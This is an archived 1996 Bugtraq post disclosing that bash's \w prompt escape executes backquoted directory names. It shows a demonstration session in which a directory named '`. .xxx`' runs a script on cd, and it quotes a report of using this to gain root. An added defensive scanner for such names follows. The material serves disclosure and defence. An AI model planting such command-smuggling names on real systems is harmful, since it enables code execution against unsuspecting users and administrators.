Bugtraq mailing list archives
Re: tee see shell problems
From: ol () niif ru (Oleg Girko)
Date: Tue, 17 Sep 1996 14:47:29 +0400
Hello people!

On Mon, 16 Sep 1996, David S. Goldberg wrote:

> I just tested a variation of this exploit with bash 1.14.6(1) running on Linux 2.0.13. By using my variation I managed to become root. I find this frightening. In my variation I wasn't as subtle. To use a large portion of the original exploit. Hopefully things like this won't happen, but it is possible. I know that I will forever be much more careful when cd'ing from now on. This is a very simplistic example, but I am sure more difficult ones can be devised.
>
> I tried the same with bash 1.14.6(1) on Solaris 2.5 (sparc, though theoretically it shouldn't matter), SunOS 4.1.4, BSDI 2.0.1 and IRIX 5.3, and was unable to perform the exploit using the * wildcard expansion (if I typed in the directory name with the backquotes directly, it did work, which I would expect). I ran bash under truss (on Solaris) and sure enough, the backquote expansion is simply not done. The * expansion generates the backquoted file name, which is passed to chdir. I was able to perform this exploit with tcsh 6.05 on all the above platforms, but not with tcsh 6.04. I don't know why it worked for bash under linux, but I don't have a linux box available to me to check it out.
There is a problem in \w substitution in the command prompt. Look at this:

    ol@snark:~ (0/286) cd /tmp
    ol@snark:/tmp (0/287) echo $PS1
    \u@\h:\w (0/\!)
    ol@snark:/tmp (0/288) mkdir '`. .xxx`'
    ol@snark:/tmp (0/289) cat > '`. .xxx`'/.xxx
    #!/bin/sh
    echo 'YOU LOOSE!!!'
    ol@snark:/tmp (0/290) cd '`. .xxx`'
    ol@snark:/tmp/YOU LOOSE!!! (0/291) echo $BASH_VERSION
    1.14.6(1)
    ol@snark:/tmp/YOU LOOSE!!! (0/292) uname -a
    SunOS snark 5.5 Generic sun4m sparc SUNW,SPARCstation-20
    ol@snark:/tmp/YOU LOOSE!!! (0/293)

       __
      /  )/   Oleg Girko, sys admin in SPb Univ. Physics Inst. Comp. Centre
     (__/(_,  Email: ol () niif spb su   Phone: +7 (812) 428 45 27
              http://www.niif.spb.su/~ol/   In some MUDS is known as Luarvic

    GCM/CS d--(x) H++ s:+> !g p?(3) !au>* a25 w(+) v C++ UB++++$ UL++++$ UU++++$ US++++$ P+ L+ 3++>+++
    E N+ K- W-- M-- V- -po+ Y !t !5 !j R G? !tv b+>++ D+ B? e++ u+ h- f+ r->+++ n+ y+(-)>+++
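For administrators checking shared directories such as /tmp for names like the one in the session above, here is a small scanner. It is an added example, not part of the original post, and the function names (`has_cmdsubst`, `scan_dirs`, `count_suspicious`, `make_sample_tree`) and the sample tree are constructed for illustration. It goes slightly beyond the post by also matching the `$(` form of command substitution.

```shell
#!/bin/sh
# Added example (not from the original post): flag directory names that
# carry command-substitution syntax, like the '`. .xxx`' name above.

# has_cmdsubst NAME: succeed if NAME contains a backquote or "$(".
has_cmdsubst() {
    case $1 in
        *'`'*|*'$('*) return 0 ;;
    esac
    return 1
}

# scan_dirs ROOT: print every directory under ROOT whose own name is
# suspicious. Names are matched as data only; nothing here passes them
# through eval or any other expansion.
# Limitation: one path per line, so names containing newlines will split.
scan_dirs() {
    find "$1" -type d \( -name '*`*' -o -name '*$(*' \) -print 2>/dev/null
}

# count_suspicious ROOT: number of suspicious directories under ROOT.
count_suspicious() {
    scan_dirs "$1" | wc -l | tr -d ' '
}

# make_sample_tree: build a constructed test tree and print its path.
# The odd names are created as literal strings and never executed.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir "$t/plain" "$t/"'`. .xxx`' "$t/plain/"'$(id)'
    printf '%s\n' "$t"
}

# Scan the directory given on the command line, if any.
if [ $# -gt 0 ]; then
    scan_dirs "$1"
fi
```

Run it as `sh scan.sh /tmp` (the script name is an assumption); any path it prints deserves a look before anyone with a `\w` prompt changes into it.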